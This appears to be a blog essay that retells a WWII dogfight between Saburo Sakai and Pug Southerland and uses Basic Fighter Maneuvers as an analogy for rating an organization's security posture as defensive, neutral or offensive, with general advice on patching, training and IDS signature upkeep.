I just watched an amazing documentary about the historical dogfight between Saburo Sakai and Pug Southerland called “Secrets of the Dead: Dogfight Over Guadalcanal”

This documentary discussed, in depth, the strategy that the two pilots used when attacking and evading each other. Each pilot had distinct advantages during the dog fight.

Sakai’s plane, the Mitsubishi A6M2, better known as the “Zero,” was a lightweight, nimble plane with a huge operating range.

The plane’s lightweight airframe and skin, made of high-tech duralumin alloy (aluminum alloyed with copper, manganese, and magnesium), gave the Zero its truly remarkable fuel efficiency, operating range, and agility. And the Zero’s armaments were impressive: two 7.7 mm machine guns, along with two 20 mm cannons. Together, the four guns were a deadly combination that gave the pilots multiple options when they engaged.

But the Zero’s engineers — charged with producing the lightest, fastest, most deadly airborne killing machine they could — skimped on some vital gear at the expense of the pilots. The Zero was very lightly armored, and did not have bulletproof glass or the self-sealing fuel tanks that were becoming common on European and U.S. aircraft by WW II.

The Grumman F4F-4 Wildcat piloted by Pug Southerland was a very different aircraft. While the heavier Wildcat couldn’t match the Zero’s turning capabilities, climbing speed or range, it made up for its deficiencies with raw power (a 1,200-horsepower engine), superior diving speed, and an amazing ability to withstand punishment.

Southerland’s flying skill and inherent knowledge of his plane’s capabilities allowed him to survive against the quicker Zero. He even managed to gain the advantage, but when he had the chance to shoot down Sakai, his guns remained silent.

Since World War II all U.S. pilots have been trained in Basic Fighter Maneuvers (BFM). BFM’s are generally grouped into two categories:

• Offensive BFM
• Defensive BFM

BFM is a series of fluid and often improvised proactive and reactive actions, varying infinitely according to range, altitude, speed, aircraft type, weapons system type and any of an enormous range of other factors.

There are three basic situations in ACM requiring BFM to convert to a favorable result. The three situations, and the primary goals of a pilot in that situation are:

• Defensive – the pilot is in a weak position, primarily concerned with denying a shot to the opponent rather than achieving a dominant position. The goal in this situation should be to convert to a neutral situation or extend to escape the unfavorable position.
• Neutral – neither the pilot nor their opponent have a particular advantage, nominally defined as the ability to “point” the nose of his/her aircraft at the opponent with sufficient range to employ forward firing ordnance (missiles/gun) prior to their opponent threatening in a similar manner. Each is focused on converting to an offensive situation whilst forcing their opponent defensive.
• Offensive – the pilot is in a dominant position, primarily concerned with prosecuting their advantage for a kill.

What does all of this information have to do with information security you might ask? Using the principals of BFM one can evaluate the current security posture of their environment as well as take steps to improve.

Your organization is in a Defensive position if:

• You are reactive to incidents instead of having defined procedures to properly handle them
• You are slow to adopt security best practices within your organization
• You only update your infrastructure software/firmware when there is a major news story about another organization being compromised

This is the worst position for your organization to be in because you are the exact class of victim that attackers are looking for. If you are not prepared to handle the incident in a quick and intelligent manner then the risk is lower that the attacker will be noticed or caught. If your staff does not know how to handle the incident or is not properly trained to handle the incident then the risk is lower that the attacker will be noticed or caught. If you don’t update your software/firmware on a regular basis then you are placing your entire organization at risk. Attackers typically monitor product mailing lists and news groups for flaws and exploits so why wouldn’t you?

Your organization is in a Neutral position if:

• You keep yourself, your team, and your superiors abreast of the latest security trends and issues
• You actively update your servers, hosts, routers, switches, firewalls, and intrusion signatures to prevent malicious activity
• You foster continuing education practices to keep yourself and your team educated on the latest methods for handling and profiling attacks

This isn’t the optimal position but it is definitely more desirable than being in a Defensive position. Keeping yourself, your team, and your superiors abreast of the latest security trends and issues ensures that new attack vectors do not catch your organization by surprise. This allows you to be better prepared in the event of an incident by knowing what is happening in ‘the wild’.

This reminds me of an aerial maneuver called The Scissors which is primarily used to get a defending plane behind an attacking plane in a dogfight. The defending plane simply flies in a vertical zigzagging flight path. The pilot pitches the nose up and down during flight to accomplish this.

This decreases the plane’s forward speed during the climb by trading kinetic energy (speed) for gravitational potential energy (height). The average forward speed also decreases due to the airplane flying a much longer distance during the maneuver. The aggressor, however, may also attempt this maneuver to remain offensive by staying behind the defending plane. The pilot that best executes this maneuver will end up in the better offensive position by being above and behind the other plane.

You can see, by the following diagram, that it is quite easy to continue this maneuver over and over again in and endless game of cat and mouse. With all things being equal, the only way for one pilot to achieve an advantage is for the other pilot to disrupt the patern:

When you actively update your enterprise infrastructure you not only ensure that your systems risk of compromise is decreased but your visibility is increased. For example, analysis of intrusion (IDS/IPS/HIPS) logs is worthless unless your signatures are current and properly tunned to detect anomalous traffic in your network.

As many of you know I am a big proponent of continuous learning, especially in the security field. If one does not keep themselves educated on the latest attack and defense method and practices then you quickly become obsolete — not to mention a liability.

Lastly, your organization is in a Offensive position if:

• You can, with complete certainty, state that your organization is completely prepared for any attack, existing or not-yet-conceived
• You rewrite all of your software, firmware, and operating environments to compensate for any and all attacks that could ever be attempted
• You are capable of preemptive strikes on all potential attackers to eliminate the possibility of an attack

Obviously the Offensive position is the optimal stance that you would wish to achieve. Unfortunately, all things being equal, this is completely impossible without the ability to predict the future. This is the Panacea or silver bullet position as you cannot have a cure for all issues relating to security. If a company released a product or service, that could guarantee that your organization could achieve a constant Offensive position, their shareholders would be dancing all the way to the bank.

I hope you enjoyed this article. I’d like to thank the the people at PBS and the contributers to Wikipedia.org. Without them I would not have had the inspiration or the content to create this article.